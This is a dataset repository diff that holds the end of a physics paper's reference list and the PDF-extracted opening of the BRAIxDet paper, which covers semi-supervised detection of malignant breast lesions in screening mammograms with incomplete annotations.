+ T. Glatzel, D. Loss, and E. Meyer, npj Quantum Infor-
1360
+ mation 2, 10.1038/npjqi.2016.35 (2016).
1361
+ [36] S. R. Elliott and M. Franz, Rev. Mod. Phys. 87, 137
1362
+ (2015).
1363
+ [37] R. Aguado, LA RIVISTA DEL NUOVO CIMENTO 40,
1364
+ 523 (2017).
1365
+ [38] M. Leijnse and K. Flensberg, Semiconductor Science and
1366
+ Technology 27, 124003 (2012).
1367
+ [39] T. D. Stanescu and S. Tewari, Journal of Physics: Con-
1368
+ densed Matter 25, 233201 (2013).
1369
+ [40] R. M. Lutchyn, J. D. Sau, and S. Das Sarma, Phys. Rev.
1370
+ Lett. 105, 077001 (2010).
1371
+ [41] T.-P. Choy, J. M. Edge, A. R. Akhmerov, and C. W. J.
1372
+ Beenakker, Phys. Rev. B 84, 195442 (2011).
1373
+ [42] J. Klinovaja, P. Stano, A. Yazdani, and D. Loss, Phys.
1374
+ Rev. Lett. 111, 186805 (2013).
1375
+ [43] S. Jeon, Y. Xie, J. Li, Z. Wang, B. A. Bernevig, and
1376
+ A. Yazdani, Science 358, 772 (2017).
1377
+ [44] P. Marra and M. Nitta, Phys. Rev. B 100, 220502 (2019).
1378
+ [45] R. Pawlak, S. Hoffman, J. Klinovaja, D. Loss, and
1379
+ E. Meyer, Progress in Particle and Nuclear Physics 107,
1380
+ 1 (2019).
1381
+ [46] B. J¨ack, Y. Xie, and A. Yazdani, Nature Reviews Physics
1382
+ 3, 2522 (2021).
1383
+ [47] C. Nayak, S. H. Simon, A. Stern, M. Freedman, and
1384
+ S. Das Sarma, Rev. Mod. Phys. 80, 1083 (2008).
1385
+ [48] S. D. Sarma, M. Freedman, and C. Nayak, npj Quantum
1386
+ Information 1, 2056 (2015).
1387
+ [49] R. Wiesendanger, Rev. Mod. Phys. 81, 1495 (2009).
1388
+ [50] P. W. Anderson, Phys. Rev. 124, 41 (1961).
1389
+ [51] E. Prada, R. Aguado, and P. San-Jose, Phys. Rev. B 96,
1390
+ 085418 (2017).
1391
+ [52] L. M´ath´e, D. Sticlet, and L. P. Zˆarbo, Phys. Rev. B 105,
1392
+ 155409 (2022).
1393
+ [53] H. Bruus and K. Flensberg, (Oxford: Oxford University
1394
+ Press) (2012).
1395
+ [54] D. N. Zubarev, Soviet Physics Uspekhi 3, 320 (1960).
1396
+
1NE1T4oBgHgl3EQf5AWE/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
1NFQT4oBgHgl3EQf1DYE/content/tmp_files/2301.13418v1.pdf.txt ADDED
@@ -0,0 +1,1709 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ Medical Image Analysis (2023)
2
+ Contents lists available at ScienceDirect
3
+ Medical Image Analysis
4
+ journal homepage: www.elsevier.com/locate/media
5
+ BRAIxDet: Learning to Detect Malignant Breast Lesion with Incomplete Annotations
6
+ Yuanhong Chena,∗, Yuyuan Liua, Chong Wanga, Michael Elliottb, Chun Fung Kwokb, Carlos Pe˜na-Solorzanob, Yu Tiana, Fengbei
7
+ Liua, Helen Frazerc, Davis J. McCarthyb,d, Gustavo Carneiroa
8
+ aAustralian Institute for Machine Learning, The University of Adelaide, Adelaide, Australia
9
+ bBioinformatics and Cellular Genomics, St Vincent’s Institute of Medical Research, Melbourne, Australia
10
+ cSt Vincent’s Hospital Melbourne, Melbourne, Australia
11
+ dMelbourne Integrative Genomics, The University of Melbourne, Melbourne, Australia
12
+ A R T I C L E I N F O
13
+ Article history:
14
+ Received 1 May 2013
15
+ Received in final form 10 May 2013
16
+ Accepted 13 May 2013
17
+ Available online 15 May 2013
18
+ Keywords:
19
+ Deep learning
20
+ Multi-view learning
21
+ Breast cancer screening
22
+ Incomplete annotations
23
+ Malignant lesion detection
24
+ Student-teacher Learning
25
+ A B S T R A C T
26
+ Methods to detect malignant lesions from screening mammograms are usually trained
27
+ with fully annotated datasets, where images are labelled with the localisation and clas-
28
+ sification of cancerous lesions. However, real-world screening mammogram datasets
29
+ commonly have a subset that is fully annotated and another subset that is weakly anno-
30
+ tated with just the global classification (i.e., without lesion localisation). Given the large
31
+ size of such datasets, researchers usually face a dilemma with the weakly annotated sub-
32
+ set: to not use it or to fully annotate it. The first option will reduce detection accuracy
33
+ because it does not use the whole dataset, and the second option is too expensive given
34
+ that the annotation needs to be done by expert radiologists. In this paper, we propose a
35
+ middle ground solution for the dilemma, which is to formulate the training as a weakly-
36
+ and semi-supervised learning problem that we refer to as malignant breast lesion detec-
37
+ tion with incomplete annotations. To address this problem, our new method comprises
38
+ two stages, namely: 1) pre-training a multi-view mammogram classifier with weak su-
39
+ pervision from the whole dataset, and 2) extend the trained classifier to become a multi-
40
+ view detector that is trained with semi-supervised student-teacher learning, where the
41
+ training set contains fully and weakly-annotated mammograms. We provide extensive
42
+ detection results on two real-world screening mammogram datasets containing incom-
43
+ plete annotations, and show that our proposed approach achieves state-of-the-art results
44
+ in the detection of malignant breast lesions with incomplete annotations.
45
+ © 2023 Elsevier B. V. All rights reserved.
46
+ 1. Introduction
47
+ Breast cancer is the most commonly diagnosed cancer
48
+ worldwide and the leading cause of cancer-related death in
49
+ women (Sung et al., 2021). One of the most effective ways
50
+ to increase the survival rate relies on the early detection of
51
+ breast cancer (Lauby-Secretan et al., 2015) using screening
52
+ mammograms (Selvi, 2014). The analysis of screening mam-
53
+ ∗Corresponding author.
54
+ e-mail: yuanhong.chen@adelaide.edu.au (Yuanhong Chen)
55
+ mograms is generally done manually by radiologists, with the
56
+ eventual help of Computer-Aided Diagnosis (CAD) tools to as-
57
+ sist with the detection and classification of breast lesions (Had-
58
+ jiiski et al., 2006; Shen et al., 2019a). However, CAD tools
59
+ have shown inconsistent results in clinical settings. Some re-
60
+ search groups (Brem et al., 2003; Hupse and Karssemeijer,
61
+ 2009; Hupse et al., 2013) have shown promising results, where
62
+ radiologists benefited from the use of CAD systems with an im-
63
+ proved detection sensitivity. However, other studies (Lehman
64
+ et al., 2015; Fenton et al., 2007, 2011) do not support the re-
65
+ imbursement of the costs associated with the use of CAD sys-
66
+ arXiv:2301.13418v1 [cs.CV] 31 Jan 2023
67
+
68
+ EISEVIERN13-AI5
69
+ MEDICAL
70
+ IMAGE
71
+ ANALYSIS2
72
+ Yuanhong Chen et al. / Medical Image Analysis (2023)
73
+ tems, estimated to be around $400 million a year (Lehman et al.,
74
+ 2015), since experimental results show no benefits in terms of
75
+ detection rate.
76
+ The use of deep learning (LeCun et al., 2015) for the analysis
77
+ of screening mammograms is a promising approach to improve
78
+ the accuracy of CAD tools, given its outstanding performance
79
+ in other learning tasks (He et al., 2016; Ren et al., 2015). For
80
+ example, Shen et al. (2019b, 2021) proposed a classifier that re-
81
+ lies on concatenated features from a global network (using the
82
+ whole image) and a local network (using image patches). To
83
+ leverage the cross-view information of mammograms, Carneiro
84
+ et al. (2017) explored different feature fusion strategies to inte-
85
+ grate the knowledge from multiple mammographic views to en-
86
+ hance classification performance. However, these studies that
87
+ focus on classification without producing reliable lesion de-
88
+ tection results may not be useful in clinical practice. Lesion
89
+ detection from mammograms has been studied by Ribli et al.
90
+ (2018) and Dhungel et al. (2015), who developed CAD sys-
91
+ tems based on modern visual object detection methods. Ma
92
+ et al. (2021) implemented a relation network (Hu et al., 2018) to
93
+ learn the inter-relationships between the region proposals from
94
+ ipsi-lateral mammographic views. Yang et al. (2020, 2021) pro-
95
+ posed a system that focused on the detection and classification
96
+ of masses from mammograms by exploring complementary in-
97
+ formation from ipsilateral and bilateral mammographic views.
98
+ Although the mammographic lesion detection methods above
99
+ show encouraging performance, they are trained on fully anno-
100
+ tated datasets, where images are labelled with the classification
101
+ and localisation of cancerous lesions. Such setup is uncommon
102
+ in large-scale real-world screening mammogram datasets that
103
+ usually have a subset of the images annotated with classification
104
+ and localisation of lesions, and the other subset annotated with
105
+ only the global classification. For example, our own Annotated
106
+ Digital Mammograms and Associated Non-Image (ADMANI)
107
+ dataset, which has been collected from the BreastScreen Vic-
108
+ toria (Australia) population screening program, has a total of
109
+ 4,084,098 images, where only 47.78% of the 21,399 cancer
110
+ cases are annotated with classification and localisation of le-
111
+ sions, and the rest 52.22% of the cases are weakly annotated,
112
+ as displayed in Figure 1. Given the large size of such datasets,
113
+ it is rather disadvantageous not to use these weakly annotated
114
+ images for training, but at the same time, it is too expensive
115
+ to have them annotated by radiologists. Therefore, in this pa-
116
+ per we propose a middle-ground solution, which is to formulate
117
+ the training as a weakly- and semi-supervised learning problem
118
+ that is referred to as malignant breast lesion detection with in-
119
+ complete annotations.
120
+ To address the incomplete annotations learning problem de-
121
+ scribed above, we introduce a novel multi-view lesion detection
122
+ method, called BRAIxDet. BRAIxDet is trained using a two-
123
+ stage learning strategy that utilises all training samples from
124
+ the dataset. In the first stage, we pre-train our previously pro-
125
+ posed multi-view classification network BRAIxMVCCL (Chen
126
+ et al., 2022) on the whole weakly-supervised training set,
127
+ where images are annotated only with their global labels.
128
+ This pre-training enables BRAIxMVCCL to produce a strong
129
+ feature extractor and a post-hoc explanation based on Grad-
130
+ Fully Annotated Data (47.78%)
131
+ Labels
132
+ Ellipse
133
+ CentroidX:
134
+
135
+ 716
136
+ CentroidY:
137
+
138
+ 1922
139
+ EllipseRadiusX:
140
+ 124
141
+ EllipseRadiusY:
142
+ 124
143
+ Pathology
144
+ Image_outcome:
145
+ Cancer
146
+ General Info
147
+ Patient ID:
148
+
149
+ xxxx
150
+ Age:
151
+
152
+
153
+ xxxx
154
+ Family History:
155
+ xxxx
156
+ ... ...
157
+ Manufacturer:
158
+ SIEMENS
159
+ Laterality:
160
+
161
+ L
162
+ ViewPosition:
163
+ CC
164
+ Weakly Annotated Data (52.22%)
165
+ Labels
166
+ Ellipse
167
+ CentroidX:
168
+
169
+ n/a
170
+ CentroidY:
171
+
172
+ n/a
173
+ EllipseRadiusX:
174
+ n/a
175
+ EllipseRadiusY:
176
+ n/a
177
+ Pathology
178
+ Image_outcome:
179
+ Cancer
180
+ General Info
181
+ Patient ID:
182
+
183
+ xxxx
184
+ Age:
185
+
186
+
187
+ xxxx
188
+ Family History:
189
+ xxxx
190
+ ... ...
191
+ Manufacturer:
192
+ FUJIFILM
193
+ Laterality:
194
+
195
+ R
196
+ ViewPosition:
197
+ MLO
198
+ Fig. 1. The data structure of our ADMANI dataset, showing fully (top,
199
+ representing 47.78% of the data) and weakly (bottom, representing the
200
+ remaining 52.22% of the data) annotated mammograms.
201
+ CAM (Selvaraju et al., 2017). In the second stage, we trans-
202
+ form BRAIxMVCCL into the detector BRAIxDet that is trained
203
+ using a student-teacher semi-supervised learning mechanism.
204
+ More specifically, the student is trained from fully- and weakly-
205
+ supervised subsets, where the weakly-supervised images have
206
+ their lesions pseudo-labelled by the teacher’s detections and
207
+ BRAIxMVCCL’s Grad-CAM results. Furthermore, the teacher
208
+ is trained from the exponential moving average (EMA) of
209
+ the student’s parameters, where the batch normalization (BN)
210
+ statistic used in the EMA is frozen after pre-training to allevi-
211
+ ate the issues related to the dependency on the samples used
212
+ to train the student, and the mismatch of model parameters be-
213
+ tween student and teacher. The major contributions of this pa-
214
+ per are summarised as follows:
215
+ • We explore a new experimental setting for the detection
216
+ of malignant breast lesions using large-scale real-world
217
+ screening mammogram datasets that have incomplete an-
218
+
219
+ RMLOYuanhong Chen et al. / Medical Image Analysis (2023)
220
+ 3
221
+ notations, with a subset of images annotated with the clas-
222
+ sification and localisation of lesions and a subset of images
223
+ annotated only with image classification, thus forming a
224
+ weakly- and semi-supervised learning problem.
225
+ • We propose a new two-stage training method to han-
226
+ dle the incomplete annotations introduced above.
227
+ The
228
+ first stage uses the images annotated with their classifica-
229
+ tion labels to enable a weakly-supervised pre-training of
230
+ our previously proposed multi-view classification model
231
+ BRAIxMVCCL (Chen et al., 2022).
232
+ The second stage
233
+ transforms the multi-view classifier BRAIxMVCCL into
234
+ the detector BRAIxDet, which is trained with a student-
235
+ teacher semi-supervised learning approach that uses both
236
+ the weakly- and the fully-supervised subsets.
237
+ • We also propose innovations to the student-teacher semi-
238
+ supervised detection learning, where the student is trained
239
+ using the teacher’s detections and BRAIxMVCCL’s Grad-
240
+ CAM (Selvaraju et al., 2017) outputs to estimate lesion lo-
241
+ calisation for the weakly-labelled data; while the teacher is
242
+ trained with the temporal ensembling of student’s param-
243
+ eters provided by EMA, with the BN parameters frozen
244
+ after pre-training to mitigate the problems introduced by
245
+ the dependency on the student training samples, and the
246
+ mismatch between student and teacher model parameters.
247
+ We provide extensive experiments on two real-world breast can-
248
+ cer screening mammogram datasets containing incomplete an-
249
+ notations. Our proposed BRAIxDet model achieves state-of-
250
+ the-art (SOTA) performance on both datasets in terms of lesion
251
+ detection measures.
252
+ 2. Related work
253
+ 2.1. Lesion detection in mammograms
254
+ Object detection is a fundamental task in computer vi-
255
+ sion (Liu et al., 2020a). The existing detection methods can be
256
+ categorized into two groups: 1) two-stage methods (Girshick,
257
+ 2015; Ren et al., 2015) that first generate region proposals based
258
+ on local objectiveness, and then classify and refine the detection
259
+ of these region proposals; and 2) single-stage methods (Red-
260
+ mon et al., 2016; Carion et al., 2020) that directly output bound-
261
+ ing box predictions and corresponding labels. In general, the
262
+ two-stage methods are preferred for non-real-time medical im-
263
+ age analysis applications, such as lesion detection from mam-
264
+ mograms (Ma et al., 2021; Yang et al., 2020, 2021), since they
265
+ usually provide more accurate detection performance. On the
266
+ other hand, single-stage methods tend to be less accurate but
267
+ faster, which is more suitable for real-time applications, such
268
+ as assisted intervention (Butler et al., 2022). Similar to previ-
269
+ ous papers that propose lesion detection methods from mam-
270
+ mograms (Ma et al., 2021; Yang et al., 2020, 2021), we adopt
271
+ the two-stage method Faster-RCNN (Ren et al., 2015) as our
272
+ backbone detector since the detection accuracy is more impor-
273
+ tant than speed in our clinical setting.
274
+ A standard screening mammogram exam contains two ipsi-
275
+ lateral projection views of each breast, namely bilateral cran-
276
+ iocaudal (CC) and mediolateral oblique (MLO), where radi-
277
+ ologists analyse both views simultaneously by searching for
278
+ global architectural distortions and local cancerous lesions
279
+ (e.g., masses and calcifications).
280
+ Recently, fully-supervised
281
+ learning methods (i.e., methods containing training sets with
282
+ complete lesion localisation and classification annotations)
283
+ have shown promising results for mass detection from single-
284
+ view (Ribli et al., 2018; Dhungel et al., 2015) and multi-view
285
+ mammograms (Ma et al., 2021; Liu et al., 2020b; Yang et al.,
286
+ 2020, 2021). However, these methods only focus on the detec-
287
+ tion and classification of masses (i.e., not all cancerous lesions),
288
+ limiting their scope and application.
289
+ Furthermore, real-world screening mammogram datasets
290
+ tend not to exclusively contain fully annotated images – instead,
291
+ these datasets usually have a subset that is annotated with lesion
292
+ localisation and classification and another subset that is weakly
293
+ annotated only with the global image classification labels. In-
294
+ stead of discarding the weakly annotated images or hiring a ra-
295
+ diologist to annotate these images, we propose a new weakly-
296
+ and semi-supervised learning approach that can use both sub-
297
+ sets of the dataset, without adding new detection labels.
298
+ 2.2. Weakly-supervised object detection
299
+ Weakly supervised disease localisation (WSDL) is a chal-
300
+ lenging learning problem that consists of training a model to
301
+ localise a disease in a medical image, even though the training
302
+ set contains only global image classification labels without any
303
+ disease localisation labels. WSDL approaches can be catego-
304
+ rized into class activation map (CAM) methods (Zhou et al.,
305
+ 2016), multiple instance learning (MIL) methods (Oquab et al.,
306
+ 2015), and prototype-based methods (Chen et al., 2019).
307
+ CAM methods leverage the gradients of the target disease at
308
+ the last convolution layer of the classifier to produce a coarse
309
+ heatmap. This heatmap highlights areas that contribute most
310
+ to the classification of the disease in a post-hoc manner. For
311
+ example, Rajpurkar et al. (2017) adopted GradCAM (Selvaraju
312
+ et al., 2017) to achieve WSDL in chest X-rays. Lei et al. (2020)
313
+ extended the original CAM (Zhou et al., 2016) to learn the im-
314
+ portance of individual feature maps at the last convolution layer
315
+ to capture fine-grained lung nodule shape and margin for lung
316
+ nodule classification. MIL-based methods regard each image
317
+ as a bag of instances and encourage the prediction score for
318
+ positive bags to be larger than for the negative ones. To extract
319
+ region proposals included in each bag, early methods (Oquab
320
+ et al., 2015) adopted max pooling to concentrate on the most
321
+ discriminative regions. To avoid the selection of imprecise re-
322
+ gion proposals, Noisy-OR (Wang et al., 2017), softmax (Sei-
323
+ bold et al., 2020), and Log-Sum-Exp (Wang et al., 2017; Yao
324
+ et al., 2018) pooling methods have been used to maintain the
325
+ relative importance between instance-level predictions and en-
326
+ courage more instances to affect the bag-level loss. Prototype-
327
+ based methods aim to learn class-specific prototypes, repre-
328
+ sented by learned local features associated with each class,
329
+ where classification and detection are achieved by assessing the
330
+ similarity between image and prototype features, producing a
331
+
332
+ 4
333
+ Yuanhong Chen et al. / Medical Image Analysis (2023)
334
+ detection map per prototype (Chen et al., 2019). The major
335
+ weakness of WSDL methods is that they are trained only with
336
+ image-level labels, so the model can only focus on the most dis-
337
+ criminative features of the image, which generally produce too
338
+ many false positive lesion detections.
339
+ 2.3. Semi-supervised object detection
340
+ Large-scale real-world screening mammogram datasets usu-
341
+ ally contain a subset of fully-annotated images, where all le-
342
+ sions have localisation and classification labels, and another
343
+ subset of images with incomplete annotations represented by
344
+ the global classification labels.
345
+ Such setting forms a semi-
346
+ supervised learning (SSL) problem, where part of the training
347
+ does not have the localisation label. There are two typical SSL
348
+ strategies, namely: pseudo-label methods (Sohn et al., 2020;
349
+ Liu et al., 2021; Xu et al., 2021) and consistency learning meth-
350
+ ods (Jeong et al., 2019).
351
+ Pseudo-label methods are usually explored in a student-
352
+ teacher framework, where the main idea is to train the teacher
353
+ network with the fully-annotated subset, followed by a train-
354
+ ing of the student model with pseudo-labels produced by the
355
+ teacher for the unlabelled data. Sohn et al. (2020) proposed
356
+ STAC, a detection model pre-trained using labelled data and
357
+ used to generate labels for unlabelled data, which is then used
358
+ to fine-tune the model.
359
+ The unbiased teacher method (Liu
360
+ et al., 2021) generates the pseudo-labels for the student, and the
361
+ student trains the teacher with EMA (Tarvainen and Valpola,
362
+ 2017), where the teacher and student use different augmented
363
+ images, and the foreground and background imbalances are
364
+ dealt with the focal loss (Lin et al., 2017). Soft teacher (Xu
365
+ et al., 2021) is based on an end-to-end learning paradigm that
366
+ gradually improves the pseudo-label accuracy during the train-
367
+ ing by selecting reliable predictions.
368
+ The pseudo-labelling
369
+ methods above have the advantage of being straightforward to
370
+ implement for the detection problem. However, when fully-
371
+ annotated data is scarce, the student network can overfit the
372
+ incorrect pseudo-labels, which is a problem known as confir-
373
+ mation bias that leads to poor model performance.
374
+ Consistency learning methods train a model by minimiz-
375
+ ing the difference between the predictions produced before and
376
+ after applying different types of perturbations to the unlabelled
377
+ images. Such strategy is challenging to implement for object
378
+ detection because of the difficulty to accurately match the de-
379
+ tected regions across various locations and sizes after pertur-
380
+ bation.
381
+ Recently proposed methods (Jeong et al., 2019; Xu
382
+ et al., 2021) use one-to-one correspondence perturbation (such
383
+ as cutout and flipping) to solve this problem. Nevertheless, such
384
+ strong perturbations are not suitable for medical image detec-
385
+ tion since they could erase malignant lesions. Also, perturba-
386
+ tions applied to pixel values (e.g., color jitter) are not helpful for
387
+ mammograms since they are grey-scale images. Furthermore,
388
+ searching for the optimal combination of the perturbations and
389
+ the hyper-parameters that control the data augmentation func-
390
+ tions is computationally expensive. Given the drawbacks of
391
+ consistency learning methods, we explore pseudo-label meth-
392
+ ods in this paper, but we introduce a mechanism to address the
393
+ confirmation bias problem.
394
+ 2.4. Pre-training methods in medical image analysis
395
+ Pre-training is an important step whenever the annotated
396
+ training set is too small to provide a robust model train-
397
+ ing (Clancy et al., 2020).
398
+ The most successful pre-training
399
+ methods are based on ImageNet pre-training (Bar et al., 2015;
400
+ Carneiro et al., 2017), self-supervised pre-training (Vu et al.,
401
+ 2021), or proxy-task pre-training (Clancy et al., 2020).
402
+ ImageNet pre-training (Russakovsky et al., 2015) is widely
403
+ used in the medical image analysis (Bar et al., 2015; Carneiro
404
+ et al., 2017), where it can enable faster convergence (Raghu
405
+ et al., 2019) or compensate for small training sets (Carneiro
406
+ et al., 2017). However, ImageNet pre-training can be problem-
407
+ atic given the fundamental differences in image characteristics
408
+ between natural images and medical images. Self-supervised
409
+ pre-training (Vu et al., 2021) has shown strong results, but
410
+ designing an arbitrary self-supervised task that is helpful for
411
+ the target task (i.e., lesion detection) is not trivial, and self-
412
+ supervised pre-training tends to be a complex process that can
413
+ take a significant amount of training time. The use of proxy-
414
+ task pre-training (Clancy et al., 2020) is the method that usu-
415
+ ally shows the best performance, as long as the proxy task is rel-
416
+ evant to the target task. We follow the proxy-task pre-training
417
+ given its superior performance.
418
+ 3. Proposed method
419
+ Pre-training
420
+ Stage
421
+ Student-teacher
422
+ Stage
423
+ BRAIxDet
424
+ (Teacher)
425
+ BRAIxDet
426
+ (Student)
427
+ GradCAM
428
+ BRAIxMVCCL
429
+ Fig. 2. Overview of the proposed multi-stage training that comprises
430
+ the pre-training on a weakly-supervised classification task, and a semi-
431
+ supervised student-teacher learning to detect malignant lesions with
432
+ incomplete annotations.
433
+ During pre-training, we train the classifier
434
+ BRAIxMVCCL using a weakly-labelled version of Ds, called �Ds, and Dw.
435
+ After pre-training, we transfer two types of information to the next train-
436
+ ing stage: 1) the set �Dw that contains the detected lesions using the Grad-
437
+ CAM maps from the classifier applied to the samples in Dw; and 2) the
438
+ BRAIxMVCCL’s parameter θ, and running mean γ and standard devia-
439
+ tion β for batch norm layers. The semi-supervised student-teacher learning
440
+ builds the teacher and student BRAIxDet detectors from BRAIxMVCCL’s
441
+ parameters, where the student is trained with the fully-supervised Ds and
442
+ the pseudo-labelled �Dw produced from the teacher’s detections and Grad-
443
+ CAM detections in �Dw, and the teacher is trained with exponential moving
444
+ average of the student’s parameters.
445
+ Problem definition. Our method aims to train an accurate
446
+ breast lesion detector from a dataset of multi-view (i.e., CC
447
+ and MLO) mammograms containing incomplete annotations,
448
+
449
+ Yuanhong Chen et al. / Medical Image Analysis (2023)
450
+ 5
451
+ i.e., a dataset composed of a fully-annotated subset Ds and a
452
+ weakly-annotated subset Dw. The fully-annotated subset is de-
453
+ noted by Ds = {xm
454
+ i , xa
455
+ i , Ym
456
+ i }|Ds|
457
+ i=1 , where x ∈ X ⊂ RH×W repre-
458
+ sents a mammogram of height H and width W, xm
459
+ i represents
460
+ the main view, xa
461
+ i is the auxiliary view (with m, a ∈ {CC, MLO}
462
+ and m � a), Ym
463
+ i = {cm
464
+ i, j, bm
465
+ i,j}
466
+ |Ym
467
+ i |
468
+ j=1 denotes the classification and
469
+ localisation of the |Ym
470
+ i | image lesions, with cm
471
+ i,j ∈ C = {0, 1} de-
472
+ noting the jth lesion label (with 1 = cancer and 0 = non-cancer)
473
+ and bm
474
+ i, j ∈ B ∈ R4 representing the top-left and bottom-right
475
+ coordinates of the bounding box of the jth lesion on xm
476
+ i . The
477
+ weakly-annotated subset is defined as Dw = {xm
478
+ i , xa
479
+ i , cm
480
+ i }|Dw|
481
+ i=1 ,
482
+ with cm
483
+ i
484
+ ∈ C = {0, 1}. The testing set is similarly defined as
485
+ the fully-annotated subset since we aim to assess the lesion de-
